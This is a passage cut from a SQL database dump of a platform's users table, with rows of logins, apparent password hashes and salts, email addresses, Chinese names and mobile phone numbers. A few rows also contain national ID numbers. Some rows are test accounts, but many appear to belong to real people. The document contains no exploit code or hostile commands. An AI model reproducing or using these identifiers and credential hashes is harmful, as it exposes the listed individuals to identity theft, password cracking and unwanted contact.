21:02:39','User',NULL,'day','23d541b8c0cdf12838a2da964aa320d8',10,0,0,0,'15607310002',1,NULL,0,'秦雨双',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','47e8e095fd94f77fe88fed1ecd56cdfb84f02597',20,0,0,0,0,0,0),(23,'p21736908','b6da2da922829dbb1169b370367eb9ab481f6da4','','周访琴','educoder0003@qq.com',0,1,'2019-01-25 11:44:49','',NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49','User',NULL,'only_my_events','4fa53786bcb5c630ac9bb3df1eb9c112',NULL,0,0,0,'15607310003',1,NULL,0,'周访琴',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','8b813d2b61a2c996071af519502f6d1505955b0c',21,0,0,0,0,0,0),(24,'p50813649','f20e7f11a7d3d4203c339f149fbd27a4fae9f3aa','','李南莲','educoder0004@qq.com',0,1,'2019-01-25 11:44:49','',NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49','User',NULL,'only_my_events','4953bf884adea286e887e441dfdbf5cc',NULL,0,0,0,'15607310004',1,NULL,0,'李南莲',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','f813662a99cda0051a0a09059e573338bfeb49f2',22,0,0,0,0,0,0),(25,'p38079451','74a70f3072bb48c7592fc702b4c39d8e733a8006','','陶\n 平夏','educoder0005@qq.com',0,1,'2019-01-25 11:44:49','',NULL,'2019-01-25 11:44:49','2019-01-25 11:44:50','User',NULL,'only_my_events','c30a5bf06d1ca0f7f8814f635e3b5e02',NULL,0,0,0,'15607310005',1,NULL,0,'陶\n 平夏',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','770d5021b2a7254bfdc01452daf2eb50d6620bae',23,0,0,0,0,0,0),(26,'p81523470','2e38acc166c5ba566972db9dcfc53915042e414f','','吕尔芙','educoder0006@qq.com',0,1,'2019-11-21 16:58:08','',NULL,'2019-01-25 11:44:50','2019-03-04 16:35:41','User',NULL,'day','987d1528bf524d0b92612b890b925285',11,0,0,0,'15607310006',1,NULL,0,'吕尔芙',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','7b44d03b99b2bc20811967b8a90112c36ce6bd0b',24,0,0,0,0,0,0),(27,'p56234718','f2db9aa477722fa589998e4e6c515ced46bbf9b5','','赵寻南','educoder0007@qq.com',0,1,'2019-03-13 10:18:51','',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50','User',NULL,'only_my_events','7c251521fb871cb5b2f225cee7c0b1b1',NULL,0,0,0,'15607310007',1,NULL,0,'赵寻南',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','0423a55ff73157ee52ef0a12bb5a7ddb6d0a2bad',25,0,0,0,0,0,0),(28,'p29715843','ade7842547734ca15d4610938dddcc6f13592e59','','吕安雁','educoder0008@qq.com',0,1,'2019-03-04 09:58:51','',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50','User',NULL,'only_my_events','00d220cceae12b1473ca8a7c3e90d0cf',NULL,0,0,0,'15607310008',1,NULL,0,'吕安雁',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','1d283d162a2e6abe57b8b67c282f60c5364f3432',26,0,0,0,0,0,0),(29,'p80426359','e84eab10f8bc4c0d301514f0b98098749190161b','','钱友儿','educoder0009@qq.com',0,1,'2019-10-11 16:33:23','',NULL,'2019-01-25 11:44:50','2019-03-28 10:48:44','User',NULL,'day','82c2e782a0a56d06c2fb0d9fc35e39d6',15,0,0,0,'15607310009',1,NULL,0,'钱友儿',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','aba50b41c7c04f91a85431022c5bc165b97878fb',27,0,0,0,0,0,0),(30,'p93105276','8912a9cdf79ce4dc1b71060267ec3ce8e2ff1e26','','杨又晴','educoder0010@qq.com',0,1,'2019-02-21 11:17:55','',NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50','User',NULL,'only_my_events','20f86884d835366878d74611bd26fba4',NULL,0,0,0,'15607310010',1,NULL,0,'杨又晴',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','ad8706414c937e23fdde2c3954049b0afdb462cf',28,0,0,0,0,0,0),(31,'p93645870','8715148827bf1ff150f670ed0b91a9fec98ae1a1','','杨半雪','eduforge0001@qq.com',0,1,'2019-04-28 09:00:34','',NULL,'2019-03-13 16:32:19','2019-03-21 17:31:00','User',NULL,'day','5e46fc98fb4e8640319d6c38ccd948dc',12,0,0,0,'15607320001',1,NULL,0,'杨半雪',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','ccd7092f53ea6b615269f0accb64bfa56fd1624c',29,0,0,0,0,0,0),(32,'p26913408','28c35e77da9e883ef06a387a10ab00be03b19ae7','','钱千凝','eduforge0002@qq.com',0,1,'2019-10-29 21:15:20','',NULL,'2019-03-13 16:32:20','2019-03-22 16:06:18','User',NULL,'day','f30b217f7ccabbd4bb2decb52cfb5f64',14,0,0,0,'15607320002',1,NULL,0,'钱千凝',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','d7a425b5e31ad17428adb1a8147e13b3f7ca9fcb',30,0,0,0,0,0,0),(33,'p15239786','f7c411229a24b49771290511d319ed62460a24de','','孔冬灵','eduforge0003@qq.com',0,1,'2019-03-13 16:32:20','',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20','User',NULL,'only_my_events','368b1851ea013b3a3bf768e18e587fb5',NULL,0,0,0,'15607320003',1,NULL,0,'孔冬灵',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','e68f376b9279cf7f64e78a76a1388ec83704b3fe',31,0,0,0,0,0,0),(34,'p05617423','527acee3468355028d08d7eccda5843df1a0243b','','陈慕儿','eduforge0004@qq.com',0,1,'2019-03-13 16:32:20','',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20','User',NULL,'only_my_events','5139c1196e217ff27d887bf219bbcd6b',NULL,0,0,0,'15607320004',1,NULL,0,'陈慕儿',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','558480ca2d1b58eedb6a3f9e990376e4e1284a13',32,0,0,0,0,0,0),(35,'p81473620','a735b95471b855bb9454462f80ed8fb623114d0d','','姜向萍','eduforge0005@qq.com',0,1,'2019-03-13 16:32:20','',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20','User',NULL,'only_my_events','36d49e978bbcc159a71013b481d501bb',NULL,0,0,0,'15607320005',1,NULL,0,'姜向萍',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','1a7c0a2db76ff37be28955c18f2147069705d0f7',33,0,0,0,0,0,0),(36,'p43702695','397c951f48bd622ab1dd8d8e1334ebdb7c602c84','','蒋觅荷','eduforge0006@qq.com',0,1,'2019-03-13 16:32:20','',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20','User',NULL,'only_my_events','5b5e807eafef66192bcc74d46b83ab16',NULL,0,0,0,'15607320006',1,NULL,0,'蒋觅荷',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','1104d5622c85a6ace2acc501b004d94d3bdf49c8',34,0,0,0,0,0,0),(37,'p85017694','6cd54698ba7af34f1ff266dbc52dff3bea7f66ce','','王映梦','eduforge0007@qq.com',0,1,'2019-03-13 16:32:20','',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20','User',NULL,'only_my_events','556c4db98c8e506a34ad71883dbddddc',NULL,0,0,0,'15607320007',1,NULL,0,'王映梦',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','8f0fd498a40e46cb2a05364123f27d084d6a672f',35,0,0,0,0,0,0),(38,'p61743098','43fc535a50d826229a764dfdd4a79c6e76a8f73a','','姜秋灵','eduforge0008@qq.com',0,1,'2019-03-13 16:32:20','',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:21','User',NULL,'only_my_events','40a719bc5c3f20b16fd0073a1858ab59',NULL,0,0,0,'15607320008',1,NULL,0,'姜秋灵',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','80bc9d8488fc5945e13dd9c9c7cf10bd95e06d9a',36,0,0,0,0,0,0),(39,'p91472068','06395a728e69509236a6b53447bb8fa008d4e2bd','','吕平绿','eduforge0009@qq.com',0,1,'2019-03-13 16:32:21','',NULL,'2019-03-13 16:32:21','2019-03-13 16:32:21','User',NULL,'only_my_events','ccdb53200ac344736dc74a35e06c4ee7',NULL,0,0,0,'15607320009',1,NULL,0,'吕平绿',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','1f4d3529b9ef788aceb7f22bb6e725911698ccce',37,0,0,0,0,0,0),(40,'p06751394','336b6ebad03c6003898851f380c184bba907f09f','','孙妙柏','eduforge0010@qq.com',0,1,'2019-03-13 16:32:21','',NULL,'2019-03-13 16:32:21','2019-03-13 16:32:21','User',NULL,'only_my_events','6124c297f2a5284d3133e220f2552f5a',NULL,0,0,0,'15607320010',1,NULL,0,'孙妙柏',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','7e627dd1907eb19afb2039eca5b4750cee387bce',38,0,0,0,0,0,0),(41,'p19083625','b9236670df115d24f419af76f352d53bd532b71f','','wanzhong','dzlyqlzq@163.com',0,1,'2019-10-28 15:07:12','',NULL,'2019-03-21 21:28:44','2019-10-28 15:06:58','User',NULL,'day','4d4ccddf123e9e11d4145f7754e95998',13,0,0,0,'18253422098',0,NULL,0,'xialin',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','0373c3df90fc2285e3f36e266bfb19c06ff340d3',39,0,0,0,0,0,0),(42,'p38942170','e136a8aa99de23bc0eb6db92cd7b63058b1c5e2b','','陈伯韬','cas5144@163.com',0,1,'2019-04-17 09:43:51','',NULL,'2019-04-09 15:27:41','2019-04-17 09:55:48','User',NULL,'only_my_events','6c2e2f17691c32001d895a40b1a05700',16,0,0,0,'18569415107',0,NULL,0,'陈伯韬',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','45250e83d8b95373aac3e87c6ec8c57255c8baa0',40,0,0,0,0,0,0),(43,'p67958241','8e64604bbb7c8ae98a30054b2bdb7177cd8e8151','','杨懿','1729833128@qq.com',0,1,'2019-04-17 09:49:36','',NULL,'2019-04-17 09:49:36','2019-04-17 09:57:04','User',NULL,'only_my_events','0feeb74a817c5096a885ded9c9d56491',17,0,0,0,'15717412992',0,NULL,0,'杨懿',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','20624be2fc5001cc1abbd3912fa20bf04f83425d',41,0,0,0,0,0,0),(44,'p57834691','8403b058794ef20be6a159a5c16091f2f2d722fb','','白楚','zb14zb14@hotmail.com',0,1,'2019-04-18 11:06:17','',NULL,'2019-04-18 11:06:17','2019-04-18 11:07:46','User',NULL,'only_my_events','61053b6b581f53553341d09a65fb9a16',NULL,0,0,0,'13875934142',0,NULL,0,'zz14zz14',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','cbdf90d995c3e3e800de94954737ab0abb72e74c',42,0,0,0,0,0,0),(45,'p94386572','d7b5723bd3c62bbb8b992f9033f63cbaa89afa7a','','吴波','cherry_wb@163.com',0,1,'2020-03-27 19:33:18','',NULL,'2019-06-09 11:31:04','2020-03-27 19:21:15','User',NULL,'','ef572b17fe12914dc74e8559d6a2d990',NULL,0,0,0,'18092380139',0,NULL,0,'吴波',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','4d8890f7fb1cdb2f5256e4ced0aa231259afaf39',43,0,0,0,0,0,0),(46,'p78543092','5282d63061106c26d5ff58ad37cb513a126500f0','','李明军','limj_9803@163.com',1,1,'2021-03-11 03:48:53','',NULL,'2019-08-06 08:33:43','2021-03-11 03:48:53','User',NULL,'','1228c4f44a99c540e9e9777fbcbf9b08',21,0,0,0,'18911166797',0,NULL,0,'DavidLi',1,0,'372325197301010011',0,1,1,0,0,0,0,NULL,'forge','0523d2c4a4f19fcde6c7c7d11856cbe0d94a3914',44,0,1,0,1,0,0),(47,'p96170835','4bb01e4e8d86d74429d3340cb6606bde8548a9cc','','sylor_huang','xamppp@126.com',1,1,'2020-10-13 15:26:30','',NULL,'2019-08-06 09:10:25','2020-09-01 02:15:52','User',NULL,'day','56ab7f75d5e0bb7dec29ef4de4b166d5',42,0,0,0,'13986179525',0,NULL,0,'sylor_huang',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','62f3bd815b6177b64431b3f8677b050611e0eb13',45,0,1,0,0,0,0),(48,'p64583910','a177fcf05693383221681d8e7d4c992ea08b48ab','','jasder','2053003901@qq.com',1,1,'2021-03-19 11:31:41','',NULL,'2019-08-06 09:24:30','2021-03-15 03:11:12','User',NULL,'day','ea2ff22066a0471b064c282499388d0c',34,0,0,0,'18684812012',0,NULL,0,'jasder',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','016fbe8c5b528308bf8acf603b32c9cd3bc7528f',46,0,1,1,1,0,0),(49,'p51497208','6846eaa152e6b5d1a64d31d08873f6003211973c','','李国宁','111@qq.com',0,1,'2021-03-15 00:21:39','',NULL,'2019-08-07 09:33:05','2021-03-15 00:21:39','User',NULL,'day','d79a833f26af662732782e443aade79f',18,0,0,0,'15633333333',0,NULL,0,'李国宁',0,0,'371323199604262519',0,0,0,0,0,0,0,NULL,'forge','ddd159114ac64633514fe5210d9ad29e84a29234',47,0,1,0,1,0,0),(50,'p71924506','1f3757b262ff5ea8533f8c39f35be908e5836648','','OpenSource','222@qq.com',1,1,'2021-02-06 12:29:40','',NULL,'2019-08-07 09:37:08','2021-01-19 02:59:19','User',NULL,'day','325b5fa80bd2101ca27040e6b5b97e5a',20,0,0,0,'15644444444',0,200,0,'OpenSource',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','a0f5c8d539fd8d6be4072d7fa68728f1aae8d6e5',48,0,1,0,1,0,0),(51,'p49726105','831e344e89d5295bd0ff1394594539661b3808be','','张翔','12345@163.com',0,1,'2020-03-14 09:28:49','',NULL,'2019-08-07 14:53:28','2019-08-07 14:55:11','User',NULL,'','70a5d86ef8765af57033e995c5de2348',NULL,0,0,0,'15110092740',0,NULL,0,'张翔',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','22c87051cfa7bf3848c7c671fc2b17f5c19ec027',49,0,0,0,0,0,0),(52,'p09125783','64e72d862e8eff10d32776b4d333408a7a008ad4','','超级管理员','ztyemail@126.com',1,1,'2019-11-26 15:06:50','',NULL,'2019-08-07 15:44:39','2019-11-02 13:52:42','User',NULL,'day','5fb2a7a9851b44a795b99e0c8c104d2c',27,0,0,0,'13667364915',0,NULL,0,'admin',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','c6e49deefd0adf3ccffb4bc5cf6882603dd5a61b',50,0,0,0,0,0,0),(53,'p23041857','5da1086a12e4388235b3ee8294218f9eb619810d','','liming','liming@126.com',0,1,'2019-11-11 16:02:16','',NULL,'2019-08-13 09:30:25','2019-08-14 08:15:13','User',NULL,'day','63d9eda508dc9dd4d9e75c46bb84834a',22,0,0,0,'13621213829',0,NULL,0,'liming',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','d3497f25144f0c2c95016f59f290ac01f28e7185',51,0,0,0,0,0,0),(54,'p36850791','92e294a334481e09a186896feefc4d5943392922','','开源镜像','opensource@example.com',1,1,'2019-08-26 08:58:10','',NULL,'2019-08-14 16:50:06','2019-08-14 16:52:06','User',NULL,'day','9f1a06179a2b599fe51df61c9b65cd5c',23,0,0,0,'13666666666',0,NULL,0,'开源镜像',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','2d0640cb01cdcaaa0cc59a5a5fc461cf52db44fe',52,0,0,0,0,0,0),(55,'p17836459','7f4d4d0072312ce5d116fd2986bb30d50c715068','','王涛','taowang2005@nudt.edu.cn',0,1,'2021-03-11 00:57:53','',NULL,'2019-08-17 08:59:42','2021-03-06 03:26:11','User',NULL,'day','d3bbc088ddaa495f42894c89f15f2554',39,0,0,0,'13975850702',0,NULL,0,'王涛',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','999cd3e3f8f70af9be5f1125dca0e575cd9bc07b',53,0,1,0,0,0,0),(56,'p15679402','06aed7187286b53c739df734c54a5d95c146d98f','','ZY','ww@sina.com',0,1,'2019-09-16 10:29:59','',NULL,'2019-09-16 09:59:25','2019-09-16 10:30:19','User',NULL,'','6f7c0d8281336aac471488d38904b36b',NULL,0,0,0,'13975810032',0,NULL,0,'ZY',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','7034af7df6d2ae188b71c8a1f91128a12959118e',54,0,0,0,0,0,0),(57,'p39842056','56b41211c478bc3ba2c3ffebc0ca1cdc44adb943','','','',0,1,'2019-10-10 16:48:10','',NULL,'2019-10-10 16:48:10','2021-03-05 06:53:36','User',NULL,'','f81c44d5861591ed56814388a2d17d04',NULL,0,0,0,'15521145261',0,NULL,0,'yyl',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','13ef17ee038e76874d0068ab02d68b77bc38b892',149,0,0,0,0,0,0),(58,'p79162350','20c6098adbe9b68227733e75b5b93da54e580438','','','',0,1,'2019-11-12 09:23:14','',NULL,'2019-10-19 09:24:20','2021-03-05 06:53:36','User',NULL,'day','abdd49ceecf2084d1c2309acd266bcbc',NULL,0,0,0,'13455555555',0,NULL,0,'p79162350',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','f8a75e492e030bdaa16b3c76679ad913fcc81b96',150,0,0,0,0,0,0),(60,'p53284067','6ec16a5b068f07432185412ae5cbea90751dd772','','','',0,1,'2019-10-29 10:00:26','',NULL,'2019-10-29 10:00:26','2021-03-05 06:53:36','User',NULL,'','8f1c9aae9cadc45a6a3a870afd189fe0',NULL,0,0,0,'15914025169',0,NULL,0,'认真起来自己都怕',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','73989f3c0c1134f0b029fade1225d5c33cd0c601',151,0,0,0,0,0,0),(61,'p86054721','660039b53bdcf7d72b7a808267ed08e88f97b602','','','1111@qq.com',0,1,'2019-11-25 17:13:22','',NULL,'2019-10-29 17:07:24','2019-10-31 15:13:45','User',NULL,'day','5c0f02c09f1820d4c7ded54512946efa',29,0,0,0,'13987655674',0,NULL,0,'张翔',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','26dd79461544923383820344161f7ca3ce3ef4fc',55,0,0,0,0,0,0),(62,'p38547912','6d2b8651f1edc967033cf9bac175b8b6bce8d896','','易','',1,1,'2019-10-29 17:09:55','',NULL,'2019-10-29 17:08:25','2021-03-05 06:53:36','User',NULL,'only_my_events','7ea0a57be6dbe893fa1a479aaa29a885',NULL,0,0,0,'13977654433',0,NULL,0,'易',1,0,'371323199604262519',0,0,0,0,0,0,0,NULL,'forge','8967fb501830504604fc43ada68eb104cf37f0eb',152,0,0,0,0,0,0),(63,'m17230869','cb0db2c1d91097ea34355cab6d4e523f748268f6','','','test1@example.org',0,1,'2021-02-09 09:20:09','',NULL,'2019-10-31 18:37:10','2020-10-16 00:23:20','User',NULL,'day','7c01bd06e104601f086067922971dec9',33,0,0,0,'18677778881',0,NULL,0,'翟小玉',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','3e586d13c054822a2e2e8099842c892ee5005164',56,0,1,0,0,0,0),(64,'m94108237','43181ffa192c0e106de14aeded20bfea4ad2ea46','','','test2@example.org',0,1,'2021-01-06 07:45:15','',NULL,'2019-10-31 18:37:10','2021-01-06 07:45:15','User',NULL,'day','4fab1075078c89cd9356643114ef54c5',30,0,0,0,'18677778882',0,NULL,0,'唐艺',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','690850b718f0a2f079117ab37c1b96f7cb461d9c',57,0,0,0,0,0,0),(65,'m79305216','bf7b35e3b1eddc2c0f20b3f08d0948ddb5a5ddb3','','','test3@example.org',0,1,'2020-03-23 15:03:11','',NULL,'2019-10-31 18:37:10','2019-11-06 16:23:14','User',NULL,'day','687806a3c8aa5671428a5fffe41c18b2',31,0,0,0,'18677778883',0,NULL,0,'张翔',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','87fec226f5b76f1fc1320e12d78990281e4599f8',58,0,0,0,0,0,0),(66,'m26508134','145aa0883844adf8cd89a3a61afd62d90955c783','','','test4@example.org',0,1,'2021-02-09 10:11:19','',NULL,'2019-10-31 18:37:10','2021-01-07 02:24:03','User',NULL,'day','9337e57675cf729f09d6b3a0c2c09984',32,0,0,0,'18677778884',0,NULL,0,'陈力',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','43f581d0a34e5edf9fdf14491e4084f2d35a182b',59,0,1,0,0,0,0),(67,'m79540236','6397a62eb8602d65b2e6a6ef80a02c531629a652','','','test5@example.org',0,1,'2019-10-31 18:37:10','',NULL,'2019-10-31 18:37:10','2019-10-31 18:37:10','User',NULL,'','f14375bccbdf6bddaf37cffcf512a213',NULL,0,0,0,'18677778885',0,NULL,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'0','0edca9fc0aead8bb145ad38e2e5fd01e8c4cfa5c',60,0,0,0,0,0,0),(68,'m68504923','913fbeb76316eecc6692dec274cba6c94c8d8d0b','','','test6@example.org',0,1,'2019-10-31 18:37:11','',NULL,'2019-10-31 18:37:11','2019-10-31 18:37:11','User',NULL,'only_my_events','b0cd2e4cb629241cc7c24bb7844f01f4',NULL,0,0,0,'18677778886',0,NULL,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'0','47cf9a6e64f1be6b7b3e65b1b8931c53a9a00cf4',61,0,0,0,0,0,0),(69,'m65801937','bdf15514e86f621e8f575a99add57975251c7b91','','','test7@example.org',0,1,'2019-11-06 16:08:37','',NULL,'2019-10-31 18:37:11','2019-10-31 18:37:11','User',NULL,'only_my_events','9fef64cc59fa59cd4a37af501b65b068',NULL,0,0,0,'18677778887',0,NULL,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'0','b7d3d07822005e141d122510c7a35d4604e61766',62,0,0,0,0,0,0),(70,'m20537869','c713e2adb98bac3a9e4c97ccb810c81b10d4405f','','','test8@example.org',0,1,'2019-10-31 18:37:11','',NULL,'2019-10-31 18:37:11','2019-10-31 18:37:11','User',NULL,'','553d6cabc5c10468dc9abc4583c9c540',NULL,0,0,0,'18677778888',0,NULL,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'0','2bfdd85c7bdaa477852d5486d4f2a3c2c0fa9e22',63,0,0,0,0,0,0),(71,'m12478536','b8cb0ce3c595d3e896b25f2d2b88418da3c01539','','','test9@example.org',0,1,'2020-10-15 09:43:02','1',NULL,'2019-10-31 18:37:11','2019-11-05 15:36:18','User',NULL,'only_my_events','aebcb8d5585b73f73bf0296b6d7574e2',NULL,0,0,0,'18677778889',0,NULL,0,'m12478536',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','120bbdd0bb2bf12d95c39c08245faa44df7b03c1',64,0,1,0,1,0,0),(73,'p93612587','e3df06b2126e1328c94b2459be07029b2fba4876','','','1221@qq.com',0,1,'2021-03-03 15:00:05','',NULL,'2019-11-25 11:25:31','2021-03-01 08:25:02','User',NULL,'only_my_events','0a01a57d14ceebdb5ae6d4ac2fbb2e22',NULL,0,0,0,'15610376287',0,NULL,0,'qqq',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','1b33931399f2a213ab1e248e114510e622d53818',65,0,1,0,0,0,0),(74,'p18732509','30cf868ae0c861aeee5e0ce41f4f270b5ba631ac','','','',0,1,'2020-02-01 12:47:12','',NULL,'2020-02-01 12:47:12','2021-03-05 06:53:36','User',NULL,'','2f3d51526e0e894e2b0f88c105465c23',NULL,0,0,0,'15802569718',0,NULL,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','a5165cb2ed742c8c19aa2a8c7b3f255fb7a4b926',153,0,0,0,0,0,0),(75,'p72934568','6d26e227066b08aa6b04140bf66f25f027553741','','闻市委','1514780658@qq.com',0,1,'2020-02-12 08:33:51','',NULL,'2020-02-01 18:52:39','2020-02-01 19:34:51','User',NULL,'day','129f8282b042bd7e97e64020ab3a5aa6',36,0,0,0,'18507497207',0,NULL,0,'莫伊',1,0,'341224199310105310',0,0,0,0,0,0,0,NULL,'0','8a1ea26fc82687752b9139a2ddbdc310841aa997',66,0,0,0,0,0,0),(76,'p60294315','78e7d63f8774cc473374134ad3ab64ed01d5d33f','','','jsc04@126.com',0,1,'2020-04-21 08:23:25','',NULL,'2020-02-01 20:34:46','2020-02-01 22:30:58','User',NULL,'only_my_events','a7f6014cf48e8507dfa1f3a1819d1965',37,0,0,0,'18518278000',0,NULL,0,'金戈',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','0b2269cf229a02085016c4d7efa808c898ed6b3c',67,0,0,0,0,0,0),(77,'p83571629','f9e7400fe46acdf34eda0c4978c2c6431f6ae176','','','yanzhenwang@hotmail.com',0,1,'2020-02-12 14:42:20','',NULL,'2020-02-01 22:26:36','2020-02-10 10:07:33','User',NULL,'day','a2430aef51d55a627b507dc31d14c47f',38,0,0,0,'15116306060',0,NULL,0,'VolodjaNiu',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','8d6b53383b17752d5a7962851b4ae880231695ca',68,0,0,0,0,0,0),(78,'p30472618','762144d3205768343ac142ed87dee868ff96faca','','','taowang.2005@outlook.com',0,1,'2020-02-03 17:19:19','',NULL,'2020-02-03 17:19:19','2020-02-03 17:38:33','User',NULL,'day','60a53c54d9fde0c23bfad95860ab28ad',40,0,0,0,'13467663113',0,NULL,0,'天涯',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','29a150321207d3f5b2e7eb05522ba8d56e812bfc',69,0,0,0,0,0,0),(79,'p18602734','a875fb4c3f73015dc82049c7769b6718125b825f','','','yinguixin@163.com',0,1,'2020-02-05 09:50:18','',NULL,'2020-02-04 22:00:19','2020-02-04 22:27:44','User',NULL,'only_my_events','79a5daf87362bcf5a7e5b7e30ac1051e',NULL,0,0,0,'18622002052',0,NULL,0,'尹桂信',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','f1c45c87ee44cacf4863cde65e3726c476ad9925',70,0,0,0,0,0,0),(80,'p69042815','c8114a66b3efb2d9dda9475c6e22c82570abbf43','','','306731041@qq.com',0,1,'2020-04-20 09:40:10','',NULL,'2020-02-04 22:09:45','2020-02-25 23:01:31','User',NULL,'only_my_events','a25953cc9c14f55fe7750f6263538323',43,0,0,0,'13027499606',0,NULL,0,'王玲',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','6ff4cb6a25dc9fbbb7033e121eecab91b6b215a4',71,0,0,0,0,0,0),(81,'p35829704','9410c443cd92bf4df7eae1fab4b3c2e5d27cdf88','','','rxg_nudt@126.com',0,1,'2020-02-13 09:41:27','',NULL,'2020-02-05 10:29:30','2020-02-11 09:44:37','User',NULL,'only_my_events','59abffba4df4074e352d257eaa21bea4',NULL,0,0,0,'15501098181',0,NULL,0,'任小广',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','8cc974031a1f024048b6e62e131ccf8936b28654',72,0,0,0,0,0,0),(82,'p85140293','e3c68e9e0b4106ed8a312f4b129b2a92135af92c','','','jack20030552@163.com',0,1,'2020-02-20 08:31:19','',NULL,'2020-02-05 10:30:48','2020-02-05 10:37:32','User',NULL,'only_my_events','6cc397ee73911bc2a690f41518b8b392',NULL,0,0,0,'18511180568',0,NULL,0,'Jack',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','3940ff1a526c89ef1e1adb578d4498a1c4357d6b',73,0,0,0,0,0,0),(83,'p97084312','89af2a32226e564f40b5e99489b2c92b2aeace1e','','','linbin@kylinos.cn',0,1,'2020-02-11 09:00:52','',NULL,'2020-02-05 10:31:59','2020-02-05 10:36:44','User',NULL,'only_my_events','8674ed4a09c43f15e36a087dc96ad500',NULL,0,0,0,'13203112880',0,NULL,0,'bingo',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','91f55c56b4e71c06777f5a47a1ef1ee41a63ade5',74,0,0,0,0,0,0),(84,'p81736429','4ebee53de9f8a3e17ab55ed93b83311bcd9b701a','','','1598775637@qq.com',0,1,'2020-02-12 09:26:32','',NULL,'2020-02-05 10:33:10','2020-02-12 09:29:02','User',NULL,'only_my_events','309a04a6592c7e8a8bec4c83e9a06bbb',NULL,0,0,0,'18202282605',0,NULL,0,'赵名扬',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','3b34cbb46e26e72960c4fe0192d6a5e98f1ad876',75,0,0,0,0,0,0),(85,'p28619073','6f31caa760c9414cc7989529644c8ea544353c55','','','',0,1,'2020-02-05 10:46:58','',NULL,'2020-02-05 10:35:26','2021-03-05 06:53:37','User',NULL,'only_my_events','69bb6414c097fab30d1b8faac2516550',NULL,0,0,0,'13811892035',0,NULL,0,'dibin',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','fd4f6806bd25f5a350ed45decd74c8e9393a1b1a',154,0,0,0,0,0,0),(86,'p54839210','3b503aedb5f20df3083cb2378c9403d4f8b5a62d','','','ylwu1988@hotmail.com',0,1,'2020-02-11 09:59:26','',NULL,'2020-02-05 10:38:36','2020-02-11 10:43:46','User',NULL,'only_my_events','6296591636930833ef9d0400c544d120',NULL,0,0,0,'18600420625',0,NULL,0,'武云龙',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','b0a70f43e010279977aa6dce90b2bcdc97bb8723',76,0,0,0,0,0,0),(87,'p56894321','add05eefcd74259b9fbc37a91e2ec88fd3a07193','','','javy329@hotmail.com',0,1,'2020-02-05 10:47:55','',NULL,'2020-02-05 10:39:59','2020-02-05 10:42:08','User',NULL,'only_my_events','21c342daaf3b6bd54fa5dbd85cacd55f',NULL,0,0,0,'17610686329',0,NULL,0,'Hao',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','eb89aa04036d5dffa3aaa2aa6998d7f9973d4909',77,0,0,0,0,0,0),(88,'p75102394','11a1c0025fa72fa51591254368b7523e1f741ce3','','','',0,1,'2020-02-05 10:48:52','',NULL,'2020-02-05 10:43:18','2021-03-05 